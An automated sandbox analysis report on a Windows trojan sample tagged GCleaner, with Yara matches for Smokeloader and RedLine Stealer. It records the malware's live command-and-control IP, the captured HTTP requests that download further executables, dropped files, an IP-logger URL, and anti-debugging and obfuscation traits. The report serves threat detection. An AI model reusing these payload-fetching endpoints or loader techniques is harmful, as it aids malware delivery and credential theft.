Windows Analysis Report
nRGKqzVQRt.exe

Overview

General Information

Sample name: nRGKqzVQRt.exe (renamed because original name is a hash value)
Original sample name: 75c689774e5b58a3c4ced392928b6053.exe
Analysis ID: 1528608
MD5: 75c689774e5b58a3c4ced392928b6053
SHA1: 6df791246e3cf66eaca12d98c0d92a686423316f
SHA256: 6bfff4412fcb97df9d2a431f513eca541576330aed2859ecba479daa8831e47e
Tags: 32, exe, GCleaner, trojan
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • nRGKqzVQRt.exe (PID: 3212 cmdline: "C:\Users\user\Desktop\nRGKqzVQRt.exe" MD5: 75C689774E5B58A3C4CED392928B6053)
    • WerFault.exe (PID: 3160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 732 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2304 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 772 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5936 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 772 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 792 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1372 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 528 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 3524 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1016 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4184 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1468 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5788 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1292 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Yara matches (Source, Rule, Description, Author, Strings):
Source: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Author: unknown, Strings:
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Source: 00000000.00000002.2604082377.000000000076F000.00000040.00000020.00020000.00000000.sdmp, Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Author: unknown, Strings:
  • 0x5ad3:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: nRGKqzVQRt.exe, Avira: detected
Source: http://80.66.75.114/dll/downloadG, Virustotal: Detection: 9%
Source: http://80.66.75.114/dll/download, Virustotal: Detection: 18%
Source: http://80.66.75.114/dll/key, Virustotal: Detection: 18%
Source: http://80.66.75.114/dll/downloadC, Virustotal: Detection: 16%
Source: http://80.66.75.114/files/download, Virustotal: Detection: 19%
Source: http://80.66.75.114/name, Virustotal: Detection: 19%
Source: http://80.66.75.114/soft/download, Virustotal: Detection: 18%
Source: http://80.66.75.114/soft/download?, Virustotal: Detection: 15%
Source: http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUB, Virustotal: Detection: 18%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1], ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1], Virustotal: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Y-Cleaner.exe, ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Y-Cleaner.exe, Virustotal: Detection: 59%
Source: nRGKqzVQRt.exe, Virustotal: Detection: 31%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1], Joe Sandbox ML: detected
Source: nRGKqzVQRt.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_004034B0 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,0_2_004034B0
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00663717 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,0_2_00663717

Compliance

Source: C:\Users\user\Desktop\nRGKqzVQRt.exeUnpacked PE file: 0.2.nRGKqzVQRt.exe.400000.0.unpack
Source: nRGKqzVQRt.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0041E42D FindFirstFileExW,0_2_0041E42D
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0067E694 FindFirstFileExW,0_2_0067E694
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 08 Oct 2024 02:24:38 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-stream
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 08 Oct 2024 02:24:38 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=84Connection: Keep-AliveContent-Type: application/octet-stream
Source: Joe Sandbox ViewIP Address: 80.66.75.114 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00401840 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401840
Source: global trafficHTTP traffic detected: GET /name HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /add?substr=mixnine&s=three&sub=NOSUB HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUB
Source: nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/dll/downloadC
Source: nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/dll/downloadG
Source: nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/dll/key
Source: nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/dll/key%S
Source: nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/files/download
Source: nRGKqzVQRt.exe, 00000000.00000002.2604107405.000000000081D000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/name
Source: nRGKqzVQRt.exe, 00000000.00000002.2604107405.000000000081D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/name5o1
Source: nRGKqzVQRt.exe, 00000000.00000002.2604107405.000000000081D000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/soft/download
Source: nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/soft/download?
Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
Source: nRGKqzVQRt.exe, 00000000.00000003.2544167124.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544198660.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543219760.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544114531.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543263255.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: nRGKqzVQRt.exe, 00000000.00000003.2544167124.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544198660.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543219760.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544114531.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543263255.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://g-cleanit.hk
Source: nRGKqzVQRt.exe, 00000000.00000003.2544167124.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544198660.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543219760.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544114531.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543263255.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

Source: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2604082377.000000000076F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1] 614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: String function: 004433B0 appears 32 times
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: String function: 0040DBA0 appears 39 times
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: String function: 0066DE07 appears 39 times
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 732
Source: nRGKqzVQRt.exe, 00000000.00000003.2555310975.0000000002E89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs nRGKqzVQRt.exe
Source: nRGKqzVQRt.exe, 00000000.00000003.2555038440.00000000036BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameY-Cleaner.exe4 vs nRGKqzVQRt.exe
Source: nRGKqzVQRt.exe, 00000000.00000003.2555538426.0000000002EA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs nRGKqzVQRt.exe
Source: nRGKqzVQRt.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2604082377.000000000076F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: nRGKqzVQRt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Y-Cleaner.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.evad.winEXE@9/44@0/1
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00402940 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402940
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00774B01 CreateToolhelp32Snapshot,Module32First,0_2_00774B01
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00401840 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401840
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\name[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3212
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile created: C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3Jump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: nine.exe0_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: @G@K0_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: A@K.0_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: two.exe0_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: @G@K0_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: ZYA.0_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: NOSUB0_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: GET0_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: kc~z0_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: n[B0_2_00425AC0
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: @G@K0_2_006690C7
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: A@K.0_2_006690C7
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: @G@K0_2_006690C7
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: ZYA.0_2_006690C7
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: kc~z0_2_006690C7
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: P:C0_2_006690C7
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: nRGKqzVQRt.exeVirustotal: Detection: 31%
Source: unknownProcess created: C:\Users\user\Desktop\nRGKqzVQRt.exe "C:\Users\user\Desktop\nRGKqzVQRt.exe"
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 732
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 772
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 792
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 528
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1016
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1468
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1292
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: Cleaner.lnk.0.drLNK file: ..\AppData\Local\Temp\DV9E5wt3wGZ3\Y-Cleaner.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: nRGKqzVQRt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Source: C:\Users\user\Desktop\nRGKqzVQRt.exeUnpacked PE file: 0.2.nRGKqzVQRt.exe.400000.0.unpack .text:ER;.data:W;.vuri:R;.gocezi:R;.xolu:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeUnpacked PE file: 0.2.nRGKqzVQRt.exe.400000.0.unpack
Source: Y-Cleaner.exe.0.drStatic PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: nRGKqzVQRt.exeStatic PE information: section name: .vuri
Source: nRGKqzVQRt.exeStatic PE information: section name: .gocezi
Source: nRGKqzVQRt.exeStatic PE information: section name: .xolu
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0042C178 pushad ; retn 0042h0_2_0042C195
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0042B105 push esi; ret 0_2_0042B10E
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0042C5CC push esp; retf 0_2_0042C5ED
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0040D67E push ecx; ret 0_2_0040D691
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0042C62A push eax; iretd 0_2_0042C755
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0042C756 push eax; iretd 0_2_0042C755
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_1000E891 push ecx; ret 0_2_1000E8A4
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_004433F5 push ecx; ret 0_2_00443408
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0044142C push ecx; ret 0_2_0044143F
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0066D8E5 push ecx; ret 0_2_0066D8F8
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0067D4C9 pushad ; ret 0_2_0067D4CA
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0067D56D push esp; retf 0_2_0067D56E
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0067D50C push eax; ret 0_2_0067D50D
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0067CF6F push esp; retf 0_2_0067CF77
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_007742AC pushfd ; retf 0_2_007742AD
Source: nRGKqzVQRt.exeStatic PE information: section name: .text entropy: 6.970623447290097
Source: Y-Cleaner.exe.0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile created: C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1]Jump to dropped file
